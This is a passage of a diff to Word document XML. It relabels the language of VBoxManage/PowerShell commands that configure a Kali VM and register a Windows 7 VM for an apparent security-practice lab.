       </w:r>
@@ -5840,7 +8211,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storageattach</w:t>
       </w:r>
@@ -5849,7 +8220,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --</w:t>
       </w:r>
@@ -5858,7 +8229,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storagectl</w:t>
       </w:r>
@@ -5867,7 +8238,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'SATA' --port 1 --device 0 --type </w:t>
       </w:r>
@@ -5876,7 +8247,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>dvddrive</w:t>
       </w:r>
@@ -5885,16 +8256,34 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium 'C:\Program Files\Oracle\VirtualBox\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium 'C:\Program Files\Oracle\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VirtualBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxGuestAdditions.iso</w:t>
       </w:r>
@@ -5903,7 +8292,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -5913,41 +8302,59 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Define boot order</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Define</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> boot order</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -5956,7 +8363,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5965,7 +8372,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
       </w:r>
@@ -5974,51 +8381,33 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --boot1 disk --boot2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dvd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --boot1 disk --boot2 dvd --boot3 none --boot4 none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t># Start Kali VM</w:t>
       </w:r>
@@ -6028,15 +8417,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -6045,7 +8434,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6054,7 +8443,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>startvm</w:t>
       </w:r>
@@ -6063,43 +8452,33 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>gui</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --type gui</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Start-Sleep 10</w:t>
       </w:r>
@@ -6109,23 +8488,23 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -6135,31 +8514,85 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># 3. Create Windows VM for vulnerability) | +- 15min</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># 3. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Create</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Windows VM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>) | +- 15min</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -6169,23 +8602,23 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t># Register VM</w:t>
       </w:r>
@@ -6195,15 +8628,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -6212,7 +8645,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6221,7 +8654,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>createvm</w:t>
       </w:r>
@@ -6230,7 +8663,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --name $WINDOWS_7_VM --</w:t>
       </w:r>
@@ -6239,7 +8672,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>ostype</w:t>
       </w:r>
@@ -6248,7 +8681,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'Windows7_64' --register</w:t>
       </w:r>
@@ -6258,41 +8691,51 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Set VM settings</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Set VM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>settings</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -6301,7 +8744,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6310,7 +8753,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
       </w:r>
@@ -6319,7 +8762,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
       </w:r>
@@ -6328,7 +8771,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>cpus</w:t>
       </w:r>
@@ -6337,7 +8780,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
       </w:r>
@@ -6346,7 +8789,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>graphicscontroller</w:t>
       </w:r>
@@ -6355,7 +8798,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6364,7 +8807,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>vboxsvga</w:t>
       </w:r>
@@ -6373,7 +8816,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --</w:t>
       </w:r>
@@ -6382,7 +8825,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>vram</w:t>
       </w:r>
@@ -6391,7 +8834,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
       </w:r>
@@ -6400,7 +8843,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
       </w:r>
@@ -6409,7 +8852,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --nat-network1 $</w:t>
       </w:r>
@@ -6418,7 +8861,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -6427,51 +8870,133 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Add a SATA storage controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --clipboard-mode </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>bidirectional</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --drag-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-drop </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>bidirectional</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>SATA storage</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -6480,7 +9005,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
